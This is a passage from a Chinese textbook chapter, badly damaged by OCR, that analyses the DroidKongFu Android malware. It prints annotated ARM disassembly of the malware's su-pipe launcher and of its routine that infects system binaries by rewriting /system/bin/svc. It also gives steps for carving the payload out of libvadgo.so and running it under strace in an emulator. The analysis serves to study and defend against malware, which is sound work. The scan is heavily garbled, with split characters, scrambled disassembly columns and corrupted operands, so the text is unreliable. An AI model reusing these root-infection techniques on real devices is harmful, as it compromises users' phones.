体 ， 其 实 往 下 继续 分 析 就 会 知道 ， 病 毒 外 过 在 执行 完 主 体 后 束 调 用 
unlink() 函 数 将 其 删除 了 ! 因此 ， 我 们 要 想 分 析 病 毒 主体 ， 还 得 手工 将 
它 dump 下 来 。 从 上 面 的 分 析 中 ， 我 们 知道 了 起 始 地 址 为 0x1194， 文 件 
大 小 为 27036 字 节 ， 手 工 提取 文件 就 很 简单 了 。 使 用 Bless Hex Editor 工 
有 具 打开 libvadgo.so 文 件 ， 在 0x1194 处 点 击 一 下 鼠标 ， 然 后 往 下 拖 动 Bless 
Hex Editor 右 侧 的 滚动 条 ， 当 0x7b30(0x1194+0x699c ) 处 的 内 容 在 可 视 范 
围 内 时 ， 按 下 SHIFT 键 ， 点 击 0x7b30 所 在 的 文件 偏 移 处 ， 将 0x1194 一 
0x7b30 之 间 的 所 有 内 容 选 中 ， 然 后 在 选中 的 内 容 上 点 击 右键 选择 复制 ， 
如 图 12-10 所 示 。 
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9 DO Ba DE | wn scc: (GNJ) 4. 
00007b42|34 2E 33 00 00 47 43 43 3A 20 28 47 4E 55 29 20 34 2E|4.3..scc: (GNU) 4-| 
Offset: |0x1194 | Wootooffset % 

Signed 8 bit: Il0 | Signed 32 bit: 0 | Hexadecimal: |00 00 0000 | 其 
Ursigned8bit lo | Unsigned32bit: |0 | Decimal: |000000000000 | 
signed 16 bit: |0 | Float 32 bit: |0 | Octal: J000000000000 | 
Unsigned16bit lo | Float 64 bit: | 2.30742243413123E317 | Binary: |00000000 00000000 00| 
[| Show little endian decoding [| Show unsigned as hexadecimal ASCIl Text: | 
OFfset: 075460/ 077257 Selection: 010624 to 075457 (064634 ... INS 


图 12-10 ”使 用 Bless Hex Editor 提 取 病 毒 主体 


点 击 Bless Hex Editor 工 具 栏 上 的 “New File” 按 钮 ， 在 打开 的 新 建文 


件 页 面 中 点 击 右键 选择 粘贴 ， 然 后 点 击 “Save File” 按 钮 保存 文件 ， 
为 evil.bin 。 

3. 开启 su 权限 管 

病毒 主体 释放 完成 后 就 是 开局 su 权限 的 管道 了 。 它 的 代码 如 下 : 











命名 





.七 ext:00000A14 accesssu ; CODE XREF: .text:00000A101j 


.text:00000A14 LDR R3, =0x6C ; 相对 GoT 表 的 偏 移 

.text:00000A16 MOVS RTE #0 

.text:00000A18 LDR R5, [R4,R3] ; Oxl10c8+0x6c = 0x1134 = SYS_BIN_SU _ ptr 

.text:00000Al1A MOVS RO, R5 

.text:00000A1C BLX access ; 判断 /system/bin/su 是 否 可 以 访问 

.text:00000A20 CMP RO, #0 ; 返回 0 表示 检测 成 功 

.text:00000A22 BEO popensu ; 文件 可 访问 就 popen ("/system/bin/su",，w) 

.text:00000A24 B gopopensu ; 文件 不 可 访问 就 popen("/system/xbin/ 
SU i 


.text:00000A26 


.text:00000A26 popensu ; CODE XREF: .text:00000A221] 
.text:00000A26 LDR R1, =(aW - OxA2E) 

.text:00000A28 MOVS RO RS 

.text:00000A2A ADD Rd PC Wy 

.text:00000A2C BLX popen ; 创建 管道 运行 /system/bin/su 
.text:00000A30 ADDS R7 ‘RO, #0 ; R7=R0O 

.text:00000A32 

.text:00000A32 loc_A32 ; CODE XREF: .text:00000B521 
.text:00000A32 CMP RT 0 ; 判断 popen 是 否 执行 成 功 
.text:00000A34 BNE runcommand 

.text:00000A36 gounlink 


这 上 段 代码 很 简单 主要 是 通过 access() 函 数 判 断 su 可 执行 程序 的 路 
径 ，su 是 系统 权限 提升 程序 ， 一 般 Android 手 机 出 厂 后 不 会 保留 此 文 
件 ， 因 此 ， 此 处 的 病毒 得 以 继续 运行 的 前 提 是 手机 设备 已 经 ROOT ( 通 
常 拥有 su 程序 的 系统 意味 着 设备 已 经 ROOT) ， 检 测 完 su 的 文件 路 径 
后 ， 调 用 popen() 函 数 创建 了 一 个 管道 ， 如 果 系 统 中 拥有 su 权限 管理 程 
序 ， 此 时 会 弹出 权限 请 求 对话 框 。 接 下 来 程序 判断 管道 是 否 创建 成 功 ， 
如 果 成 功 就 runcommand 来 执行 病毒 本 体 ， 反 之 ， 则 跳 转 到 gounlink 标 号 
处 删除 病毒 本 体 后 退出 函数 。 

4. 执行 病毒 主体 

这 是 Native 层 外 壳 的 最 后 一 项 工作 了 ， 那 就 是 让 病毒 主体 “发 作 ”。 
相应 的 代码 比较 长 ， 笔 者 将 其 精 减 后 帖 出 关键 部 分 代码 如 下 : 





:00000A50 
:00000A52 
:00000A54 
:00000A56 
:00000A58 
:00000A5A 
:00000A5C 
:00000AS5E 
:00000A62 


:00000A64 
:00000A68 
:00000A6A 
:00000A6C 
:00000A6E 
:00000A70 
:00000A74 
:00000A76 


STR 
LDR 
MOV 
STR 
LDR 
LDR 
MOVS 
BLX 
MOVS 


BLX 
MOVS 
MOVS 
MOVS 
MOVS 
BLX 
MOVS 
BLX 


:00000a38 runcommand 


R3, [SP,#0xC] 
R3, =0x58 

R1, R8 

R2) [SP] 

RS [Rt RA 
R2, [SP,#0xC] 
RO RS 
sprintt 

RO RS 
strlen 

RS RY 

Rs RO 

及 潮 册 

RO, RS 
fwrite 

RO, R7 
fflush 


. 
下 


‘ 


CODE XREF: .text:00000A341] 
字符 早 “/system/bin/setprop” 
相对 GOT 表 的 偏 移 

格式 字符 串 “g%s %s %s\n” 

第 5 个 参数 压 入 堆栈 R11=Android_ID 
PROP_RUNNING_ID _ ptr (r0.bot.id) 
/system/bin/setprop 

缓冲 区 

构造 字符 串 

"/system/bin/setprop r0.bot.id 
android_id\n" 

计算 组 合 后 的 字符 串 长 度 

管道 fd 

要 写 入 的 字符 串 长 度 

按 字 节 计 算 

要 写 入 的 命令 

写 入 命令 到 管道 

管道 fa 

强制 刷新 


seesss 


.text:00000A8C STR R1, [SP] 第 5 个 参数 压 入 堆栈 R1 = "NCuttherope" 


~ 


.text:00000A8E MOVS RO, R5 ; 缓冲 区 

.text:00000A90 MOV RB ; 格式 字符 申 “%s %s Ss\n” 

.text:00000A92 BLX sprintf 

.text:00000A96 MOVS RO 六 3 ; "/system/bin/setprop r0.bot.ch 
NCuttherope\n" 

.text:00000ABA MOVS  R2, R6 ; 生成 的 恶意 文件 名 

.text:00000ABC MOVS R0，R5 ; 缓冲 区 

.text:00000ABE ADD R1, PC ; SN 

.text:00000AC0 BLX sprintf ; 恶意 文件 完整 路 径 

.text:00000AC4 MOVS RO, R5 

.text:00000AC6 BLX strlen ; 计算 文件 名 长 度 

.text:00000ACA MOVS  R3, R7 ; 管道 fa 

.text:00000ACC MOVS R2, RO ; 文件 名 长 度 

.text:00000ACE MOVvSs Rl, #1 

.text:00000RAD0 MOVvS RO, R5 ; 要 写 入 的 命令 就 是 恶意 文件 的 完整 路 径 

.text:00000AD2 BLX fwrite ; 执行 恶意 文件 

.text:00000AE6 LDR R3，=0x74697865 ” ; "tixe (exit 命 令 )" 

.text:00000AE8 MOVS RO, R5 

.text:00000AEA STR R3, [SP,#0x114] 

.text:00000AEC MOVS R3, #0xA ; 换行 符 

.text:00000AEE STRH R3, [RS5,#4] ; 写 入 换行 符 

.text:00000RF0 BLX strlen ; 长 度 应 该 是 5 个 字 节 

.text:00000AF4 MOVS Rl1, #1 

.text:00000AF6 MOVS  R2, RO 

.text:00000AF8 MOVS  R3, R7 ; 管道 fa 

.text:00000AFA MOVS RO, R5 

.text:00000AFC BLX fwrite ; 执行 exit 

.text:00000B00 MOVS RO, R7 

.text:00000B02 BLX fflush ; 强制 刷新 

.text:00000B06 “MOVS RO, R7 

.text:00000B08 BLX pclose ; 关闭 管道 

.text:00000BOC MOVS RO, 300 

.text:00000B10 BLX sleep ; 睡眠 300 毫 秒 

.text:00000B14 MOVS ” R0，R6 ; 生成 的 恶意 文件 

.text:00000B16 BLX unlink ; 删除 文件 


.text:00000B1A MOVS R05 大] 


整个 runcommand 往 su 管道 写 入 了 4 次 命令 ， 第 1 次 
是 “/system/bin/setprop r0.bot.id ee ， 这 个 r0.bot.id 是 病毒 为 感染 


后 的 手机 设置 的 一 个 ID 值 ， 取 值 为 Java 层 代码 传 进 来 的 Android 设 备 
ID。 第 2 次 写 入 su 管道 的 命令 是 “/system/bin/setprop r0.bot.ch 
NCuttheropen”， 具 体 作用 不 详 。 第 3 次 是 执行 病毒 主体 文件 ， 至 于 病毒 
主体 具体 做 了 什么 ， 我 们 将 在 下 一 小 节 进 行 分 析 。 第 4 次 是 执行 “exit”。 
命令 写 入 完成 后 调用 sleepO 函 数 睡 眠 300 坚 秒 ， 最 后 调用 unlinkO 函 数 删 
除 病 毒 主体 文件 ， 这 也 是 为 什么 使 用 “ls 。 -a” 也 无 法 找到 病毒 主体 的 原 
因 ， 从 这 里 看 得 出 ， 病 毒 作者 真 可 谓 是 “用 心 恨 兰 ”。 

执行 完 病毒 主体 ， 吏 是 goreturn 函 数 返 回 部 分 了 ， 它 的 代码 我 们 上 
面 已 经 分 析 过 了 。 人 至 此 ，Native 层 的 病毒 启动 代码 就 分 析 完 了 。 详 细 的 
代码 注释 读者 可 以 使 用 IDA Pro 导入 本 小 节 提 供 的 libvadgo.idc 脚 本 进行 
查看 ， 具 体 使 用 方法 是 : 点 击 IDA Pro 菜 单项 “File Script file”， 然 后 选 
择 libvadgo.idc 文 件 ， 此 时 IDA ”Pro 窗口 中 的 反 汇 编 代 码 会 自动 完成 注 


释 。 














12.4.3 Native 层 病毒 核心 分 析 


在 上 一 小 节 中 ， 笔 者 人 花 了 大 量 的 篇 幅 介 绍 了 DroidKongFu 变 种 病毒 
的 启动 代码 ， 并 对 每 一 行 代 人 码 都 添加 了 详细 的 注释 ， 这 样 做 的 目的 是 为 
了 让 读者 能 够 真正 地 看 懂 每 一 条 汇编 指令 ， 了 解 每 一 行 汇编 代码 的 含 
义 。Native 层 的 病毒 与 Java 层 的 病毒 不 同 ， 前 者 由 于 缺少 高 效 的 分 析 工 
具 〈( 虽 然 可 以 购买 使 用 IDA Pro 的 ARM Decompiler 插 件 ， 但 价格 非常 昂 
贯 ) ， 使 得 分 析 工 作 异 香 艰 难 。 本 小 节 将 要 分 析 的 病毒 主体 比 上 一 小 节 
的 局 动 代码 内 容 要 多 得 多 ，libvadgo.so 文 件 的 大 小 为 32432 字 节 ， 而 提取 
出 来 的 evil.bin 就 占 了 27036 字 节 。 














病毒 的 主体 主要 完成 了 功能 字符 串 解 密 、 设 置 感染 标志 、 感 染 系 统 
文件 、 获 取 远 程 指令 、 执 行 控制 命令 等 操作 。 本 小 节 将 通过 静态 与 动态 


相 结 合 的 方法 来 对 其 进行 分 析 。 





DroidKongFu 变 种 病毒 兴风作浪 已 经 有 些 时 日 了 ， 随 着 它 的 曝光 ， 
现在 病毒 的 远程 服务 器 已 经 无 法 访问 ， 运 行 安装 virus.apk， 病 毒 也 无 法 
直接 感染 手机 系统 文件 了 〈 话 虽 如 此 ， 为 了 保险 起 见 ， 读 者 切 勿 直接 在 
手机 中 安装 运行 ) ， 因 此 ， 还 需要 我 们 来 手动 地 感染 该 病毒 。 感 染 的 方 
法 很 简单 ， 将 dump 出 的 evilbin 导 入 Android 模 拟 器 ， 进 入 adb shell， 直 
接 执行 evil.bin 即 可 ， 不 过 笔者 并 不 打算 这 么 做 ， 因 为 病毒 感染 过 一 次 就 
不 会 再 被 感染 了 ， 我 们 需要 先 使 用 strace 工 具 来 为 它 作 为 一 次 API 函 数 调 
用 的 “快照 ”。 

strace 是 Linux 系 统 中 赫赫 有 名 的 调试 工具 ， 它 能 够 捕获 程序 执行 时 
调用 的 所 有 系统 API 函 数 ，Android 系 统 的 源码 中 有 该 工具 的 移植 版 ， 并 
且 默 认 生成 的 AVD 中 就 附带 有 它 ， 可 以 直接 在 adb shell 下 使 用 。 使 用 方 
法 很 简单 ， 首 先 执 行 以 下 2 条 命令 将 evilLbin 导 入 到 AVD 并 为 它 添加 执行 
权限 : 

adb push evil.bin /data/local/tmp/ 


adb shell chmod 777 /data/local/tmp/evil .bin 
然后 执行 以 下 命令 获取 一 份 系统 API 调 用 “快照 ?并 保存 到 evil.strace 
文件 中 : 


adb shell strace /data/local/tmp/evil.bin > evil.strace 

执行 完 上 面 的 命令 后 ，evil.strace 文 件 就 记录 了 evil.bin 运 行 时 调用 的 
所 有 系统 API， 打 开 该 文件 ， 我 们 先 来 看 看 如 何 阅读 这 些 数据 。 例 如 这 
行 数据 : 

sigaction(SIGILL, {0xb0005ad9, [], SA_RESTART}, {SIG_DFL}, 0) = 0 

开头 的 Sigaction 是 API 的 名 称 ， 括 号 里 面 的 参数 使 用 喜 号 “,” 分 隔 ， 
化 括号 “{}” 括 起 的 部 分 为 一 个 参数 ， 其 中 的 内 容 可 以 是 结构 体 〈( 结 构 体 
成 员 之 间 使 用 去 号 “,” 分 隔 ) 或 时 一 字段 ， 等 号 “=” 后 面 的 内 容 为 函数 的 
返回 值 。 

下 面 看 看 从 evil.strace 文 件 中 提取 的 一 段 内 容 。 














access("/system/framework/debuggerd", F_OK) = -1 ENOENT (No Such file or 


directory) 

open("/system/bin/debuggerd", O_RDONLY|O_LARGEFILE) = 3 
open("/system/framework/debuggerd", O_RDWR|O_CREAT|O_TRUNC|O_LARGEFILE, 
0600) = 4 


read(3, "\177ELF\1\1\1\0\0O\0\O\O0\O\O0\O\O\2\0(\0\1\O0\0\0°\221\0\000"..., 
4096) = 4096 

WEitE(, TVLITIEEEVLINMEYINONONXONMONONONONONMNOVMZNO NONIEVONONMO N24N ON 6 
4096) = 4096 

read(3, "YYYY\0\0\0\0YYYY\0\0\0\0YYYY\0\0\0\0YYYY\0\0\0\0"..., 4096) = 1716 
write(4, "YYYY\O0\O0\0\0YYYY\O0\O0\0\0YYYY\O0\0\0\0YYYY\O0\0\0\0"..., 1716) = 
iTL6 

read(3, "", 4096) 三 
close(3) = 
close(4) = 


sync() = 


3 05- 人 多 


Sync () = 
chmod("/system/framework/debuggerd", 0755) = 0 


有 过 Linux 编 程 经 验 的 读者 应 该 一 眼 便 可 以 看 出 ， 这 段 代 码 是 
将 /system/bin/debuggerd 文 件 复制 一 份 保存 
到 /system/framework/debuggerd。 下 面 开始 分 析 病 毒 核 心 。 

1. 功能 字符 串 解 密 

病毒 主体 同样 对 使 用 到 的 字符 串 进 行 了 加 密 ， 加 密 的 算法 与 Native 
病毒 启动 代码 使 用 的 是 一 样 的 手法 ， 只 是 简单 的 对 字符 串 的 每 个 字 节 进 
行 取 反 。 笔 者 数 了 一 下 ， 补 加 密 的 字符 串 多 达 76 条 ， 可 想 而 知 ， 病 毒 作 
者 当初 在 编写 代码 时 该 是 多 么 的 有 了 耐性 了 ! 功能 字符 串 解密 部 分 的 代码 
笔者 将 其 命名 为 init_predata， 与 Native 病 毒 启 动 代码 相应 的 函数 名 称 保 
持 一 致 。 

由 于 前 面 已 经 分 析 过 加 密 算法 ， 此 处 就 不 再 进行 讲解 了 。 

2. 设置 感染 标志 

病毒 在 发 作 前 ， 站 先 检查 自己 是 以 什么 里 份 运行 ， 即 文件 自 丑 的 文 
件 名 是 人 否 为 已 经 感染 的 系统 命令 《病毒 在 发 作 后 会 感染 系统 文件 ， 将 系 
统 部 分 命令 蔡 换 为 自身 ， 上 所以， 病毒 在 运行 前 会 检查 自己 是 不 是 以 系统 























命令 形式 运行 的 。) 。 如 果 是 束 执 行 命令 功能 传递 并 退出 。 否 则 ， 惑 同 
下 执行 ， \ 境 是 否 已 经 被 自己 感染 过 。 相 应 的 代码 如 下 : 





.七 ext:0000CRAF0O RootWork ; CODE XREF: main+3A1j 


.text:0000CAFO LDR R5, = (PROP_ RUNNING FLAG ptr - OxECB8) 
.text:0000CAF2 LDR R1, =0x44C 

.text:0000CAF4 MOVS R2, #0x7F 

.text :0000CRAF6 LDR RO [RG;RS] ; Decrypted value: r0.bot.run 
.text:0000CAF8 ADD Rl 交 主 

.text:0000CAFA STR R1, [SP,#0x4F8+name] 

.text:0000CAFC BL getpropertyvalue 

.text:0000CB00 CMP RO, #0 ; r0.bot .run 记 录 系统 是 否 已 经 感染 了 该 木马 
.text:0000CB02 BEO setprop_r0 .bot .run 


.text:0000CB04 LDRB R3, [RO] 
.text:0000CB06 CMP RS > 


.text:0000CB08 BNE loc_CBOE 

.text:0000CBOA BL die 

.text:0000CBOE 

.七 ext:0000CBOE loc_CBOE ; CODE XREF: main+581 j 
.text:0000CBOE CMP BR 

.text:0000CB10 BNE setprop_r0 .bot .run 

.七 ext:0000CB12 BL getprop_r0 .bot.val 
.text:0000CB16 

.text:0000CB16 setprop_r0 .bot .run ; CODE XREF: main+521]j 
.text:0000CB16 ; main+601]j 
.text:0000CB16 LDR R5 [Re6=R5] 

.text:0000CB18 LDR RL，=(a0 - OxCB20) 
.text:0000CB1A MOVS RO "RS 

.text:0000CB1C ADD 六 1 六 愉 "| 

.七 ext:0000CB1E BL setprop_s_s_s 

,七 ext:0000CB22 BL infectsysfile ;感染 系统 文件 
.text:0000CB26 BL setprop_r0.bot.val 
.text:0000CB2A LDR Rl, ‘=(ali = OxCB32) 
.text:0000CB2C MOVS RO RS 

.text:0000CB2E ADD Dn Be -A 
.text:0000CB30 BL setprop_s s_s 


Android 系 统 的 属性 值 是 由 /system/bin/getprop 与 /system/bin/setprop 命 
令 来 读 取 与 设置 的 ， 反 汇编 代码 中 的 getpropertyvalue 与 setprop_s_s_s 是 
这 两 个 命令 的 简单 封装 。DroidKongFu 变 种 病毒 在 运行 时 ， 会 检测 
r0.bot.run 属 性 值 是 否 为 数值 1 或 字符 串 “1”， 以 此 来 判断 系统 是 否 已 经 被 
感染 过 ， 如 果 被 感染 过 ， 就 跳 转 到 getprop_r0.bot.val 标 号 处 读 取 属性 
r0.bot.val 的 值 ， 使 用 当前 时 间 减 去 这 个 产值， 判断 是 否 大 于 3600 (实质 








为 上 次 感染 后 经 过 的 秒 数 ) ， 如 果 读 取 失 败 或 差 值 大 于 3600 束 跳 到 
setprop_r0.bot.run 标 号 处 执行 ， 相 应 代码 如 下 : 





.text:0000D450 getprop_r0 .bot .val ; CODE XREF: main+621j 
.text:0000D450 MOVS RO, #0 ; timer 

.text:0000D452 BLX time ; 获取 当前 时 间 

.text:0000D456 LDR R3, =(PROP_ RUNNING VAL ptr - OxECB8) 
.text:0000D458 MOVS Ri RO 

.text:0000DA5A LDR R1, [SP,#0x4F8+name] 

.text:0000D45C LDR RO [RG.,R3] ; Decrypted value: r0.bot.val 
.text:0000DA5E MOVS R2, #0x7F 

.text:0000D460 BL getpropertyvalue ; 这 个 属性 值 保存 的 是 病毒 发 作 的 时 间 
.text:0000D464 CMP RO, #0 

.text:0000D466 BNE loc_DA6C 

.七 eXt :0000D468 BL setprop_r0.bot.run 

.text:0000D46C 

.text:0000D46C loc D46C ; CODE XREF: main+9B61j 
.text:0000D46C BLX atol 

.text:0000D470 MOVS R3, 间 0XxE1 

.text:0000D472 SUBS R7, R7, RO ; 使 用 当前 时 间 值 减 去 保存 的 时 间 值 
.text:0000D474 LSLS R3,， R3， 半 4 ; Oxel << 4 = 0xel0 
.text:0000D476 CMP Rs. BR3 ; 判断 感染 的 时 间 间 隔 0xe10 = 3600 秒 
.text:0000D478 BLE die 

.text:0000D47A BL setprop_r0 .bot.run 





r0.bot.val 的 值 是 在 感染 系统 文件 后 写 入 的 ， 记 录 的 是 病毒 感染 成 功 
的 时 间 ， 具 体 读者 可 以 阅读 笔者 注释 好 的 setprop_r0.bot.val 标 写 处 的 代 
人 码 。setprop_r0.bot.run 处 的 代码 首先 设置 r0.bot.run 的 值 为 字符 串 “0”， 然 
后 开始 感染 系统 文件 ， 感 染 完成 后 再 将 其 设置 为 字符 串 “1?”。 

3. 感染 系统 文件 

感染 系统 文件 的 整个 过 程 非常 长 ， 而 且 代码 非常 细致 。 首 先 来 
看 /System/bin/svc 文 件 的 感染 ， 感 染 的 方法 是 新 建 一 个 临时 文 
件 /data/.bootemp， 在 该 文件 第 一 行 写 入 字符 串 “/systenybin/ifconfig”， 然 
后 读 取 /system/bin/svc 文 件 的 内 容 写 入 其 中 ， 最 后 将 /data/.bootemp 文 件 的 
全 部 内 容 写 回 到 /system/bin/svc 文 件 中 ， 接 着 病毒 检测 系统 是 否 
有 /system/etc/init.d 文 件 ， 有 的 话 也 如 法 炮制 的 进行 感染 ， 具 体 的 感染 代 


人 码 为 infectsvc() 函 数 。 相 应 代码 如 下 。 


:0000BDDE 
:0000BDE0 
:0000BDE2 
:0000BDE4 
:0000BDE6 
:0000BDE8 
:0000BDEA 
:0000BDEC 
:0000BDEE 
:0000BDF0 
:0000BDF2 
:0000BDF6 
:0000BDF8 
:0000BDFA 
:0000BDFC 
:0000BDFE 
:0000BE00 
:0000BE02 
:0000BE04 
:0000BE08 
:0000BEOA 
:0000BEOC 
:0000BEOE 
:0000BE10 
:0000BE10 
:0000BE10 
:0000BE12 
:0000BE14 
:0000BE16 
:0000BE18 
:0000BE18 
:0000BE18 
:0000BE18 
:0000BE1A 
:0000BE1C 
:0000BE1E 
:0000BE20 
:0000BE20 writeifconfig 


:0000BDD0 infectsvc 


loc_BE10 
LDRB 


loc_ BE18 


MOVS 
STR 
STR 
STR 


;GOT 首 地 址 


Ri1, =(__stack_ chk _ guard ptr - OxECB8) 
R10, RO ; /system/bin/svc 
SP，R4 
RA4, ={(_GLOBAL OFFSET_ TABLE_ - OxBDEC) 
Roa: RE 
RA4, PC 
R3; [Ra4,RIL] 
R1, #0 ; oflag 
R3, [R3] 
R3, [SP,#0x248+var_2C] 
open ; 打开 /system/bin/svc 
R7, RO, #0 
loc_BECC 
R6, SP, #0x248+buf 
R2, #0x80 
RO, R7 和 
R1，R6 » .buf 
六 2 和 
read ; 读 取 /system/bin/svc 文 件 内 容 
R11, RO ; 读 取 的 字 节 数 
RO, #0 
loc_BE10 ; 读 取 文件 内 容 的 第 一 个 字符 
goreturn ; 没 读 到 内 容 就 返回 
; CODE XREF: infectsvcec+3C1j 
R3, [R6] ; 读 取 文件 内 容 的 第 一 个 字符 
R3，#'##' ; 第 一 个 字符 是 否 为 '#' 
loc_BE1L8 
readbit2 ; 读 第 2 个 字符 
; CODE XREF: infectsvc+441j 
; infectsvc+1381j 
R1, #0 
R6, [SP,#0x248+s1] 
R1, [SP,#0x248+n] 
R1, [SP,#0x248+var_23C] 


; CODE XREF: infectsvc+16E 上 j 


.text:0000BE20 ; intectsvc+17CFHj 
.text:0000BE20 LDR R2, =(BOOT MAGIC ptr - 0xECB8) 


.text:0000BE22 LDR R5, [R4,R2] ; Decrypted value: /system/bin/ifconfig 
.text:0000BE24 STR R2, [SP,#0x248+var_244] 

.text:0000BE26 MOVS ROy RS 7 号 

.text:0000BE28 BLX strlen 

.text:0000BE2C MOVS RL RS -是 

.text:0000BE2E MOVS R2, RO P| 

.text:0000BE30 LDR RO, [SP,#0x248+sl1] ; sl 


.text:0000BE32 BLX memcmp 
.text:0000BE36 CMP RO, #0 


.text:0000BE38 BEQ goreturn 

.text:0000BE3A LDR R3, =(BOOT_ TEMP_ FILE ptr - 0xECB8) 

.text:0000BE3C LDR R1, =0x242 ; oflag 

.text:0000BE3E LDR R2; =0x1ED 

.text:0000BE40 LDR RO, [R4,R3] ; Decrypted value: /data/ .bootemp 
.text:0000BE42 STR R3, [SP,#0x248+var_238] 

.text:0000BE44 BLX open ; /data/ .bootemp 文 件 只 是 用 来 做 中 转 的 
.text:0000BE48 MOV RB RO 

.七 ext:0000BE4RA CMP RO, #0 

.text:0000BE4C BLT goreturn ; 跳 转 到 返回 处 


.text:0000BE4AE LDR R1, [SP,#0x248+t+var_23C] 
.text:0000BE50 CMP Rl1F #0 


.text:0000BE52 BEQ loc_BES5E 
.text:0000BE54 MOV RO, R8 六 迁 避 
.text:0000BE56 MOVS Ri RE6 ; buf 


.text:0000BES8 LDR R2, [SP,#0x248+n] ; nN 
.text:0000BE5RA BLX write ; 在 /data/ .bootemp 文 件 第 一 行 写 入 /system/bin/ 


ifconfig 
.text:0000BESE 
.text:0000BESE loc_BESE ; CODE XREF: infectsvc+821j 
.text:0000BESE LDR R2, [SP,#0x248+t+var_244] 
.text:0000BE60 LDR R5, [R4,R2] 
.text:0000BE62 MOVS RO RS 5 
.text:0000BE64 BLX strlen 
.text:0000BE68 MOVS Ri RS ; 二 
.text:0000BE6A MOVS R2, RO 5 斑 
.text:0000BE6C MOV RO, R8 站 证 有 


.text:0000BE6E BLX write 
.text:0000BE72 LDR R1, [SP,#0x248+var_23C] 


:0000BE74 
:0000BE76 
:0000BE78 
:0000BE7A 
:0000BE7C 
:0000BE80 
:0000BE82 
:0000BE84 
:0000BE84 
:0000BE84 
:0000BE86 
:0000BE88 
:0000BE8A 
:0000BE8C 
:0000BE90 
:0000BE92 
:0000BE94 
:0000BE96 
:0000BE98 
:0000BE9A 
:0000BE9E 
:0000BERAO 
:0000BEA2 
:0000BEA2 
:0000BEA2 
:0000BEA4 
:0000BEA8 
:0000BEAA 
:0000BEAE 
:0000BEB2 
:0000BEB6 
:0000BEB8 
:0000BEBA 
:0000BEBC 
:0000BEBE 
:0000BEC0 
:0000BEC2 
:0000BEC6 
:0000BEC8 


MOV 
MOV 
SUBS 
LDR 
BLX 
MOV 
MOV 


loc_BE84 
MOVS 
MOVS 
MOVS 
LSLS 
BLX 
SUBS 
BLE 
MOVS 
MOVS 
MOVS 
BLX 
CMP 
BEQ 


loc_BEA2 

MOVS 
BLX 
MOVS 
BLX 
BLX 
BLX 
LDR 
MOV 
MOV 
LDR 
MOVS 
MOVS 
BL 
MOVS 
BLX 


下 有 
R0O，R8 2 于 
R26, Ra Bl 2 
R1, [SP,#0x248+s1] ; buf 
write 
R55 RS 
R8, R4 
; CODE XREF: infectsvc+D0F 
R2, #0x80 
R07 及 Po 
R1, R6 PA ol 
2 ; 每 次 读 0x100 字 节 
read 
R4, RO, #0 
loc_BEA2 
RO, RS AE 
RIs RG > “lif 
和 2 ;3 
write 
R4, RO 
loc_BE84 ; 循环 读 写 文件 ， 复 制 动 作 
; CODE XREF: infectsvc+C21j 
RO RT7 > Ea 
close 
RO, RS # 注 但 
close 
sync 
sync ; 强制 刷新 
R2, [SP,#0x248+t+var_238] 
R4, R8 
RL: REG ; /system/bin/svce 
R5, [R4,R2] 
R27 二 
RO,, RS ; /data/ .bootemp 
rewritefile ; 感染 /system/bin/svc 文 件 
RO, R5 ; name 
unlink ;删除 中 转 文件 /aatay .bootemp 


EE 


Pe ba 


:0000BED8 return ; CODE XREF: infectsvc+12E|j 


:0000BEE8 POP {R4-R7, PC} ; 函数 返回 

:0000BF02 

:0000BF02 readbit2 ; CODE XREF: infectsvc+461] 
:0000BF02 LDRB R3, [R6,#1] ; 读 第 2 个 字符 

:0000BF04 CMP R3, #"1 ; 第 2 个 字符 是 否 为 '!' 
:0000BF06 BEO loc_BFOA ; 读 取 的 字 节 数 

:0000BF08 B loc_BE]18 

:0000BFOA 

:0000BFOA loc_BFOA ; CODE XREF: infectsvc+1361j 
:0000BFOA MOV 3 ; 读 取 的 字 节 数 

:0000BF0C CMP R2, #2 ; 文件 是 否 只 有 “#! ”两 个 字 节 
:0000BFOE BGT readbit3 ; 读 第 3 个 字 节 

:0000BF10 B loc_BE18 

:0000BF3E B writeifconfig 

:0000BF40 

:0000BF40 gowriteifconfig ; CODE XREF: infectsvc+1461] 
:0000BF40 MOV R3; SP 

:0000BF42 MOVS RE 天 3 

:0000BF44 ADDS Rd $0xw1LE 

:0000BF46 STR R3, [SP,#0x248+s1] 

:0000BF48 STR R1, [SP,#0x248+n] 

:0000BF4A STR R1, [SP,#0x248+var_23C] 

:0000BF4C B writeifconfig 

0000BF4C ; End of function infectsvc 





上 上面 的 代码 是 svc 文 件 的 整个 感染 过 程 ， 读 者 但 看 代码 中 的 注释 与 


函数 调用 序列 ， 


rewritefile 


个 。 


应 该 很 容易 理解 其 含义 。 男 外 ， 这 段 代 码 的 精华 部 分 为 


0 函数 ， 该 函数 在 修改 系统 文件 时 非 党 小心， 我 们 看 它 的 代 


.text:0000BB9C rewritefile 
.text:0000BB9C war_18 
.text:0000BB9C var_14 


‘text: 
text: 
text: 
>. 
itext:: 
text: 
istext: 
tt 
itext: 
.text: 
itext: 
ext: 
"text: 
:text: 
.text: 
text: 
.text: 
text: 
"text: 
"text: 
rt 
text: 
:3 
text: 
.text: 
text: 


.text: 
text: 
text: 
text: 
ext:: 
.text: 
text: 
"text: 
text: 
"text: 


ets: 
sitet 
.text: 
.text: 
text: 
"text: 
text: 
“text: 
text: 
text: 
.text: 


0000BB9C 
0000BB9C 
0000BB9E 
0000BBA0 
0000BBA2 
0000BBA4 
0000BBA6 
0000BBAA 
0000BBAC 
0000BBAE 
0000BBB2 
0000BBB4 
0000BBB8 
0000BBBA 
0000BBBC 
0000BBC0 
0000BBC2 
0000BBC6 
0000BBC8 
0000BBCC 
0000BBD0 
0000BBD4 
0000BBD6 
0000BBD8 
0000BBDA 
0000BBDC 


0000BBE0 
0000BBE2 
0000BBE4 
0000BBE6 
0000BBEA 


0000BBEA loc_BBEA 


0000BBEA 
0000BBEC 
0000BBF0 
0000BBF2 


0000BBF6 
0000BBF8 
0000BBFC 
0000BBFE 
0000BC00 
0000BC00 
0000BC00 
0000BC02 
0000BC04 
0000BC08 
0000BC08 


1oc_BC00 


了 


PUSH 
SUB 
MOVS 
MOVS 
MOVS 
BL 
STR 
MOVS 
BL 
MOVS 
BLX 
STR 
ADD 
BL 
MOVS 
BL 
MOVS 
BLX 
BLX 
BLX 
CMP 
BNE 
MOVS 
MOVS 
BL 


MOVS 
MOVS 
LSLS 
BLX 


MOVS 
BL 
MOV 
BL 


MOVS 
MOVS 
BL 

B 


= -0x18 
= 一 0x14 
{R4-R6, LR} 
SP, SP, #8 
R4, R1 ; 要 写 入 的 文件 
RE; R2 ; R6 =0 
